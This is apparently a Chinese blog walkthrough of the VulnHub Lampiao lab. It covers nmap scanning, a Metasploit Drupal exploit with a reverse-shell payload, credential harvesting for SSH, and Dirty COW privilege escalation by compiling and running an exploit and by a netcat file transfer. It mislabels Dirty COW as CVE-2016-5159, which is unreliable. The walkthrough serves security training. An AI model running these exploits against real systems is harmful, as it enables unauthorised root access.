VulnHub — Lampiao

信息收集  msfconsole    脏牛提权

 

目录

信息收集

扫描ip和端口

访问web 扫描目录

漏洞发发现与利用 

msfconsole 使用 

python命令进入交互模式

寻找配置信息 (找用户密码)

脏牛提权


信息收集

扫描ip和端口

namp -sP 扫描网段 ,得到靶机ip  

 利用nmap的TCP半开放扫描,对网站端口进行快速探测

nmap -sS -p 1-65535 192.168.164.135

该扫描方式因为它不打开一个完全的TCP连接,所以是使用频率最高的扫描方式。扫描结果发现开放22、80、1898端口

可以通过-A  来详细扫描, -p扫描所有的端口 ,时间长一点

nmap -A 192.168.164.133 -p 0-65535

可以看到1898端口也是http服务

访问web 扫描目录

继续收集信息, 在1898 端口有页面

80端口没有啥有用功能,在1898 端口 扫目录

 

得到框架的版本信息 Drupal 7.54 

漏洞发发现与利用 

msfconsole 使用 

1.搜索利用脚本: search
2.进入利用脚本: use exploit/unix/ftp/proftpd_133c_backdoor
3.查看需要设置的参数: show options
4.设置参数: set rhost 192.168.1.4
5.设置payload: set payload cmd/unix/reverse
6.查看payload需要设置的参数: show options
7.设置payload参数:set rhost 192.168.1.4
8.输入命令: run, 执行攻击,成功getshell, 井且直接为root权限

1,搜索脚本 search  

2,利用脚本 use 

3,查看需要参数 show options

 用18年的exp 就use 4 ,然后查看参数,yse就是需要设置的

4,设置参数 set

5,run 执行

输入shell 连接上 

python命令进入交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

寻找配置信息 (找用户密码)

 找到数据库信息,密码

 找账号 发现一个tiago 

ssh连接尝试 

用数据库密码成功连接上 

脏牛提权-法1

cve-2016-5159

影响:Linux内核版本大于2.6.22版本 (2007年发行,到2016年10月18日修复)
低权限的用户可利用这一漏洞在本地进行提权

接下来进行提权,首先查看下内核版本:uname -a

版本符合

在Kali中自带脏牛的脚本文件,searchsploit dirty,找到需要的文件路径

返回取得Shell的终端,按【Ctrl】+【C】返回meterpreter的session会话上传cpp文件到/tmp目录下,因为该目录一般是所有用户都具有可读可写权限

upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

 上传后再进入www-data的权限下,对cpp文件进行编译:

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o re /tmp/40847.cpp -lutil
-Wall
允许发出gcc能提供的所有有用的警告,也可以用 -W (warning) 来标记指定的警告

-pedantic
允许发出 ANSI/ISO C 标准所列出的所有警告

-ON
指定代码优化的级别为 N , o <= N <= 3

-std = c++11
就是用按 C++ 2011标准来编译的

-pthread
在 Linux 中要用到多线程时,需要链接 pthread 库

-o re
FILE 指定输出文件名,在编译为目标代码时,这一选项不是必须的。如果FILE没有指定,缺省文件名是a.out,这里是 re

再运行编译后文件并将结果输出到一个文本中./re > test.txt

 命令执行后成功将root账号的密码改为dirtyCowFun

ssh升级root 即可 

脏牛提权-法2 

手动将脏牛脚本压缩一下 传入靶机中

先压缩脏牛脚本 , tar -cvf

靶机上监听 4444端口 ,将监听内容输入到dcow.tar.gz 文件中

nc -l 4444 > dcow.tar.gz 

本机上向靶机发送  压缩好的文件 端口4444

nc 192.168.164.135 4444 < dcow.tar.gz 

靶机上收到压缩包,进行解压 tar -xvf

解压得到脏牛脚本 

然后通过目录找到脚本

使用make命令 即可运行 

make完后 发现多了一个dcow文件 ,运行dcow 就提权成功

 

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值